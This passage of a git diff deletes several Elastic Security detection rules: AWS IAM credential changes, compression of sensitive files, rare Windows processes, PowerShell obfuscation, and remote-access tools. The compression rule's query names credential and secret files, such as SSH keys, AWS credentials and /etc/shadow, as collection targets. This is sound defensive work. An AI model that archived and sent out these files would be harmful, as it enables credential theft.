"aws.cloudtrail.response_elements", - "type": "keyword" - }, - { - "ecs": false, - "name": "aws.cloudtrail.user_identity.access_key_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "aws.cloudtrail.user_identity.arn", - "type": "keyword" - }, - { - "ecs": false, - "name": "aws.cloudtrail.user_identity.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "cloud.account.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "cloud.region", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.address", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.city_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.continent_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.continent_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.country_iso_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.country_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.location", - "type": "geo_point" - }, - { - "ecs": true, - "name": "source.geo.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.postal_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.region_iso_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.region_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.timezone", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.target.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "user_agent.original", - "type": 
"keyword" - } - ], - "risk_score": 47, - "rule_id": "696015ef-718e-40ff-ac4a-cc2ba88dbeeb", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.001", - "name": "Additional Cloud Credentials", - "reference": "https://attack.mitre.org/techniques/T1098/001/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.001", - "name": "Additional Cloud Credentials", - "reference": "https://attack.mitre.org/techniques/T1098/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 9 - }, - "id": "696015ef-718e-40ff-ac4a-cc2ba88dbeeb_9", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_210.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_210.json deleted file mode 100644 index ac469831738..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_210.json +++ /dev/null 
@@ -1,126 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "auditbeat-*", - "logs-endpoint.events.*", - "endgame-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Sensitive Files Compression", - "new_terms_fields": [ - "host.id", - "process.command_line", - "process.parent.executable" - ], - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Sensitive Files Compression\n\nCompression utilities like zip, tar, and gzip are essential for efficiently managing and transferring files. However, adversaries can exploit these tools to compress and exfiltrate sensitive data, such as SSH keys and configuration files. 
The detection rule identifies suspicious compression activities by monitoring process executions involving these utilities and targeting known sensitive file paths, thereby flagging potential data collection and credential access attempts.\n\n### Possible investigation steps\n\n- Review the process execution details to identify the user account associated with the compression activity, focusing on the process.name and process.args fields.\n- Examine the command line arguments (process.args) to determine which specific sensitive files were targeted for compression.\n- Check the event.timestamp to establish a timeline and correlate with other potentially suspicious activities on the host.\n- Investigate the host's recent login history and user activity to identify any unauthorized access attempts or anomalies.\n- Analyze network logs for any outbound connections from the host around the time of the event to detect potential data exfiltration attempts.\n- Assess the integrity and permissions of the sensitive files involved to determine if they have been altered or accessed inappropriately.\n\n### False positive analysis\n\n- Routine system backups or administrative tasks may trigger the rule if they involve compressing sensitive files for legitimate purposes. Users can create exceptions for known backup scripts or administrative processes by excluding specific process names or command-line arguments associated with these tasks.\n- Developers or system administrators might compress configuration files during development or deployment processes. To handle this, users can whitelist specific user accounts or directories commonly used for development activities, ensuring these actions are not flagged as suspicious.\n- Automated scripts or cron jobs that regularly archive logs or configuration files could be mistakenly identified as threats. 
Users should review and exclude these scheduled tasks by identifying their unique process identifiers or execution patterns.\n- Security tools or monitoring solutions that periodically compress and transfer logs for analysis might be misinterpreted as malicious. Users can exclude these tools by specifying their process names or paths in the detection rule exceptions.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further data exfiltration and unauthorized access.\n- Terminate any suspicious processes identified by the detection rule to halt ongoing compression and potential data exfiltration activities.\n- Conduct a thorough review of the compressed files and their contents to assess the extent of sensitive data exposure and determine if any data has been exfiltrated.\n- Change all credentials associated with the compromised files, such as SSH keys and AWS credentials, to prevent unauthorized access using stolen credentials.\n- Restore any altered or deleted configuration files from a known good backup to ensure system integrity and functionality.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement enhanced monitoring and logging for compression utilities and sensitive file access to detect and respond to similar threats more effectively in the future.", - "query": "event.category:process and host.os.type:linux and event.type:start and\n process.name:(zip or tar or gzip or hdiutil or 7z) and\n process.args:\n (\n /root/.ssh/id_rsa or\n /root/.ssh/id_rsa.pub or\n /root/.ssh/id_ed25519 or\n /root/.ssh/id_ed25519.pub or\n /root/.ssh/authorized_keys or\n /root/.ssh/authorized_keys2 or\n /root/.ssh/known_hosts or\n /root/.bash_history or\n /etc/hosts or\n /home/*/.ssh/id_rsa or\n /home/*/.ssh/id_rsa.pub or\n /home/*/.ssh/id_ed25519 or\n /home/*/.ssh/id_ed25519.pub or\n 
/home/*/.ssh/authorized_keys or\n /home/*/.ssh/authorized_keys2 or\n /home/*/.ssh/known_hosts or\n /home/*/.bash_history or\n /root/.aws/credentials or\n /root/.aws/config or\n /home/*/.aws/credentials or\n /home/*/.aws/config or\n /root/.docker/config.json or\n /home/*/.docker/config.json or\n /etc/group or\n /etc/passwd or\n /etc/shadow or\n /etc/gshadow\n )\n", - "references": [ - "https://www.trendmicro.com/en_ca/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "6b84d470-9036-4cc0-a27c-6d90bbfe81ab", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Credential Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1552", - "name": "Unsecured Credentials", - "reference": "https://attack.mitre.org/techniques/T1552/", - "subtechnique": [ - { - "id": "T1552.001", - "name": "Credentials In Files", - "reference": "https://attack.mitre.org/techniques/T1552/001/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1560", - "name": "Archive Collected Data", - "reference": "https://attack.mitre.org/techniques/T1560/", - "subtechnique": [ - { - "id": "T1560.001", - "name": "Archive via Utility", - "reference": "https://attack.mitre.org/techniques/T1560/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - 
"type": "new_terms", - "version": 210 - }, - "id": "6b84d470-9036-4cc0-a27c-6d90bbfe81ab_210", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_212.json b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_212.json deleted file mode 100644 index 3c646efa785..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_212.json +++ /dev/null 
@@ -1,74 +0,0 @@
-{
- "attributes": {
- "anomaly_threshold": 50,
- "author": [
- "Elastic"
- ],
- "description": "Identifies rare processes that do not usually run on individual hosts, which can indicate execution of unauthorized services, malware, or persistence mechanisms. Processes are considered rare when they only run occasionally as compared with other processes running on the host.",
- "false_positives": [
- "A newly installed program or one that runs rarely as part of a monthly or quarterly workflow could trigger this alert."
- ],
- "from": "now-45m",
- "interval": "15m",
- "license": "Elastic License v2",
- "machine_learning_job_id": [
- "v3_rare_process_by_host_windows"
- ],
- "name": "Unusual Process For a Windows Host",
- "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. 
If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
- "references": [
- "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html"
- ],
- "related_integrations": [
- {
- "package": "endpoint",
- "version": "^8.2.0"
- },
- {
- "package": "windows",
- "version": "^2.0.0"
- }
- ],
- "risk_score": 21,
- "rule_id": "6d448b96-c922-4adb-b51c-b767f1ea5b76",
- "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n- Windows\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Windows Integration Setup\nThe Windows integration allows you to monitor the Windows OS, services, applications, and more.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"windows\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cWindows\u201d and select the integration to see more details about it.\n- Click \u201cAdd Windows\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cwindows\u201d to an existing or a new agent policy, and deploy the agent on your system from which windows log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows).\n",
- "severity": "low",
- "tags": [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Rule Type: ML",
- "Rule Type: Machine Learning",
- "Tactic: Persistence",
- "Resources: Investigation Guide"
- ],
- "threat": [
- {
- "framework": "MITRE ATT&CK",
- "tactic": {
- "id": "TA0003",
- "name": "Persistence",
- "reference": "https://attack.mitre.org/tactics/TA0003/"
- },
- "technique": [
- {
- "id": "T1543",
- "name": "Create or Modify System Process",
- "reference": "https://attack.mitre.org/techniques/T1543/",
- "subtechnique": [
- {
- "id": "T1543.003",
- "name": "Windows Service",
- "reference": "https://attack.mitre.org/techniques/T1543/003/"
- }
- ]
- }
- ]
- }
- ],
- "type": "machine_learning",
- "version": 212
- },
- "id": "6d448b96-c922-4adb-b51c-b767f1ea5b76_212",
- "type": "security-rule"
-}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/6ddb6c33-00ce-4acd-832a-24b251512023_7.json b/packages/security_detection_engine/kibana/security_rule/6ddb6c33-00ce-4acd-832a-24b251512023_7.json
deleted file mode 100644
index 7e4504521d7..00000000000
--- a/packages/security_detection_engine/kibana/security_rule/6ddb6c33-00ce-4acd-832a-24b251512023_7.json
+++ /dev/null
@@ -1,183 +0,0 @@
-{
- "attributes": {
- "author": [
- "Elastic"
- ],
- "description": "Identifies PowerShell scripts with an unusually high proportion of whitespace and special characters, often indicative of obfuscation. This behavior is commonly associated with techniques such as SecureString encoding, formatting obfuscation, or character-level manipulation designed to bypass static analysis and AMSI inspection.",
- "from": "now-9m",
- "language": "esql",
- "license": "Elastic License v2",
- "name": "Potential PowerShell Obfuscation via Special Character Overuse",
- "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Special Character Overuse\n\nPowerShell is a powerful scripting language used for task automation and configuration management in Windows environments. Adversaries exploit PowerShell's flexibility to obfuscate scripts, using excessive special characters to evade detection. 
The detection rule identifies scripts with high special character density, indicating potential obfuscation, by analyzing script length and character patterns, thus aiding in uncovering malicious activities.\n\n### Possible investigation steps\n\n- Review the dedup_space_script_block field to understand the script's structure and identify any suspicious patterns or keywords that might indicate obfuscation techniques.\n- Analyze the replaced_with_fire field to assess the density and distribution of special characters, which can provide insights into the obfuscation methods used.\n- Examine the file.path and host.name fields to determine the origin and context of the script execution, which can help identify if the script was run on a critical system or by a privileged user.\n- Check the user.id and agent.id fields to verify the identity of the user or agent executing the script, which can help assess if the activity aligns with expected behavior or if it might be unauthorized.\n- Correlate the powershell.file.script_block_id with other logs or alerts to identify if similar scripts have been executed elsewhere in the environment, indicating a broader attack pattern.\n\n### False positive analysis\n\n- Scripts with legitimate use of special characters for formatting or encoding may trigger false positives. Review the script's purpose and context to determine if the use of special characters is justified.\n- Automated scripts that heavily rely on string manipulation or dynamic content generation might be flagged. Consider adding exceptions for known scripts or trusted sources to reduce unnecessary alerts.\n- PowerShell scripts used in development or testing environments often contain high special character density. Implement environment-based exclusions to prevent these from being flagged in non-production settings.\n- Scripts utilizing SecureString or other security-related encoding methods may appear obfuscated. 
Verify the script's origin and purpose, and whitelist these methods if they are part of standard security practices.\n- Regularly update the detection rule to refine the pattern matching and reduce false positives by incorporating feedback from security analysts and system administrators.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent lateral movement and further execution of potentially malicious scripts.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing malicious activity.\n- Conduct a thorough review of the script block text and associated metadata to understand the intent and potential impact of the obfuscated script.\n- Remove any unauthorized or malicious scripts from the affected system to prevent re-execution.\n- Restore the system from a known good backup if the script has caused significant changes or damage to the system.\n- Update endpoint protection and intrusion detection systems to recognize and block similar obfuscation techniques in the future.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// replace repeated spaces used for formatting after a new line with a single space to reduce FPs\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"\\n\\s+\"\"\", \"\\n \")\n\n// Look for scripts with more than 1000 chars\n| eval Esql.script_block_length = length(Esql.script_block_tmp)\n| where Esql.script_block_length > 1000\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n Esql.script_block_tmp,\n 
\"\"\"[\\s\\$\\{\\}\\+\\@\\=\\(\\)\\^\\\\\\\"~\\[\\]\\?\\.]\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_count = Esql.script_block_length - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// Calculate the ratio of special characters to total length\n| eval Esql.script_block_ratio = Esql.script_block_count::double / Esql.script_block_length::double\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_count,\n Esql.script_block_length,\n Esql.script_block_ratio,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts with high whitespace and special character ratio\n| where Esql.script_block_ratio > 0.75\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_ratio", - "type": "double" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": 
false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "6ddb6c33-00ce-4acd-832a-24b251512023", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": 
"TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 7 - }, - "id": "6ddb6c33-00ce-4acd-832a-24b251512023_7", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_112.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_112.json deleted file mode 100644 index 52e36062c06..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_112.json +++ /dev/null 
@@ -1,118 +0,0 @@
-{
- "attributes": {
- "author": [
- "Elastic"
- ],
- "description": "Adversaries may install legitimate remote access tools (RAT) to compromised endpoints for further command-and-control (C2). Adversaries can rely on installed RATs for persistence, execution of native commands and more. This rule detects when a process is started whose name or code signature resembles commonly abused RATs. This is a New Terms rule type indicating the host has not seen this RAT process started before within the last 30 days.",
- "from": "now-9m",
- "history_window_start": "now-15d",
- "index": [
- "logs-endpoint.events.process-*",
- "endgame-*",
